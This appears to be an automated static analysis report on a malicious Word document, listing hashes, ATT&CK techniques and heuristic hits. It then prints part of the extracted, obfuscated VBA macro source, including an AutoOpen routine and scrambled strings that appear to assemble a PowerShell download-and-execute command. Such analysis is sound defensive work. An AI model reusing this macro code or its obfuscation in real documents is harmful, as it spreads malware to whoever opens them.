Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b08f951f027b0d8e…

MALICIOUS

Office (OLE)

Size: 183.0 KB
Created: 2018-05-15 20:59:00
Authoring application: Microsoft Office Word
First seen: 2019-08-04
MD5: aad638acbd208e53df07ac3d12445311
SHA-1: 426e3edd29d3acd95482fd268497c3146ea1daf7
SHA-256: b08f951f027b0d8e8be77f5ffb665c80624cbd5ee4d4e05b1c7ab3ac1790f843
Risk score: 142

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a Microsoft Office document containing a VBA macro. The critical heuristic that fired indicates a Shell() call within the VBA code, which is commonly used to execute arbitrary commands. The AutoOpen macro marker indicates the code is designed to run automatically when the document is opened. Because the VBA code is obfuscated, the exact payload could not be recovered by static analysis, but the intent is clearly to execute an external command.

Heuristics (5)

  • VBA macros detected [medium] (2 related findings) OLE_VBA_MACROS
    Document contains VBA macro code.
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                   Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)      144584 bytes
SHA-256: ce2273cf60db6f0f9bd37a1d843757bd78a52addcd74ba96926a1fea9dc853b9
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "YWtAOuMtrEo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub NmriZX(QDLDd)
Httbt = HROaGn
ljvcki = OZhHlm + CDbl(33973 - pYbdN - jmWRh + CDbl(22672)) - 39266 - CDbl(63391)
Llrslj = baYin
MmpGhh = 53594
End Sub
Sub zcaSCw(KDTah)
VVutjp = zBEia
akcai = FJMIQa + CDbl(68271 - vRXFHG - qQvNB + CDbl(84194)) - 14137 - CDbl(85965)
YwsAWo = concRI
dTwDY = 61493
wWTujU = NcvzQO
UhjPHj = QTiqiD + CDbl(34898 - EoiMTa - YFnTB + CDbl(28139)) - 23572 - CDbl(86420)
AtdIlN = QwjhCp
BROTX = 12447
DvJuI = cohjEb
poaJH = BSPjtX + CDbl(68845 - mCnuo - PwwTNc + CDbl(69471)) - 21091 - CDbl(54383)
DcboO = rFLjF
oMPXZb = 81446
End Sub
Sub ulQokt(GviHqp)
jQvun = KhiIh
ImDqD = UqURM + CDbl(74729 - UXlJj - PGnfz + CDbl(53316)) - 58030 - CDbl(76444)
bMCIH = kDCEb
VzjOEI = 81982
BZYBj = LVGEO
UDOIP = fmkTi + CDbl(9155 - atGHR - SnUPBo + CDbl(1320)) - 47947 - CDbl(79839)
PzzqB = SlYzzd
iiqTw = 16926
End Sub
Sub Autoopen()
On Error Resume Next
ENpJv = AnMTOf
jUVlOE = bVjSvp + CDbl(67859 - jLUEQR - BIouP + CDbl(57055)) - 58642 - CDbl(46491)
kUnXO = FFrMw
iXNGCN = 13573
SwuwIpVfBi (wJPYf + AOITdAhKqzDTS + NwUpS)
zihbBL = TFPND
RWlbn = PXWFa + CDbl(9139 - svzIk - tAlzp + CDbl(72994)) - 10240 - CDbl(83562)
nwjwLE = vcVjd
ZbZGW = 73931
End Sub
Sub bUwiL(UjXvp)
UZkaWi = KizXnE
paKaj = SYOTz + CDbl(8233 - AkjYjj - IdpBDc + CDbl(56665)) - 53458 - CDbl(76974)
wJamUt = zMZPw
RaRss = 50936
bqHGQM = IWGlrk
Wqdzfq = bUGiL + CDbl(36186 - aljkB - AGCUVI + CDbl(15728)) - 26211 - CDbl(50914)
oYLYu = otMjnA
AXEtN = 66935
WApulP = JdXiwA
SKAud = zqXRBA + CDbl(71120 - zRPui - jniRnf + CDbl(93521)) - 58912 - CDbl(31153)
BrzGiM = zjtoj
YslimM = 23042
End Sub
Sub nRLfi(iGzsSa)
PKAiSk = QLlAC
KYBBJ = EiOZn + CDbl(51381 - kVsmA - FuIhk + CDbl(310)) - 39833 - CDbl(53519)
rcjKcU = JFwjA
ABlND = 26855
End Sub

Attribute VB_Name = "rXYkfzP"
Sub rRAoq(qltdz)
SMnpRV = uGwXwG
ITDvff = QSnvu + CDbl(19093 - JQsjF - hikjTK + CDbl(25521)) - 41250 - CDbl(91145)
uEiOwX = zzRfCt
tXLSkq = 8720
End Sub
Function AOITdAhKqzDTS()
On Error Resume Next
qcudiU = USiUYt
LvTmiu = ozfllp + CDbl(92514 - ukFpGN - UToNV + CDbl(55563)) - 98392 - CDbl(94322)
UFCLQw = HKBCfO
zifWYw = 29648
VdRNa = nNfObV
pwcPb = tCGKET + CDbl(37201 - fCNFG - zPAtGA + CDbl(69565)) - 84176 - CDbl(44137)
aiJVbK = dpzMB
SMtHY = 15894
PGjVk = iKpOZ("Fcs'+RhEpSRhE'+'+RhE.'+'RhE+RhE4RhE+RhEHnnRhE+RhErRhE+RhEayRhE+RhE.2RhE+RhEoRhE+RhEhu=lRhE+RhE?pRhE+RhEhp.RhE+RhEvtset/NUH/moRhE+RLFb", 90610 + 4 - 90610, 90610 + 127 - 90610)
RIViM = wiIbL
fQkaK = jVskQH + CDbl(59548 - AhjMsM - MXRJfI + CDbl(3288)) - 26846 - CDbl(52549)
OoKWw = mjJrnS
sNzPZP = 4740
XZOJQt = iABFF
QFjLVd = WBEYJ + CDbl(46023 - bURBP - jktkU + CDbl(11837)) - 62079 - CDbl(62133)
TwqzZ = lpRHuv
WUqzs = 70316
fAQWNlV = iKpOZ("v51'X'+]3,1[)(GNIRTsoT.EcnerefERpesoBRev$ ( . | )'|','4zQ'(EcaLPER.)93]rAHc[]GniRTS[,'RhE'(EcHlSB5", 93217 + 6 - 93217, 93217 + 90 - 93217)
OizpfC = LwqPzV
hGhLw = piAuVi + CDbl(37691 - ZtVNv - vlwBRW + CDbl(94136)) - 51003 - CDbl(86834)
szZBpO = otEFk
FUBiQm = 5964
mCWpM = qkUXoN
QJmjj = rcQdRP + CDbl(8255 - rUjiLV - BinQs + CDbl(99412)) - 46370 - CDbl(28995)
QPNXD = pfAjN
WZFZHE = 98596
sRIoBYcB = iKpOZ("B5dURhE+RhE+4HRhE+RhEnR'+'hE+RhEn4Hn(RhE'+'+RhE& =RhE+RhE dRhE+RhEsadRhE+RhEasnRhE+RhExRhE+RhEJQRhE('( icss", 41409 + 5 - 41409, 41409 + 99 - 41409)
nocrN = fwToA
NHMCC = mpfBif + CDbl(15595 - fEiqkv - zVcmV + CDbl(18305)) - 77026 - CDbl(42471)
MMfuSO = CXaSJ
mGwjjj = 52152
FJYSml = PAmLqa
zUFbM = vFaSi + CDbl(83566 - XIRiS - jpSGjP + CDbl(56554)) - 61376 - CDbl(60953)
HMWfBZ = BMDfhA
GjvPWH = 67943
OAELzar = iKpOZ("zft)''nIOJ-5vwL", 31186 + 5 - 31186, 31186 + 8 - 31186)
tztYj = ZLjhP
TFLMU = OPRPLz + CDbl(78561 - AwUNJY - zTXmd + CDbl(86565)) - 60963 - CDbl(54645)
UwRrO = YjvYs
pdntj = 93313
Bakob = SWOkG
jHVEu = 
... (truncated)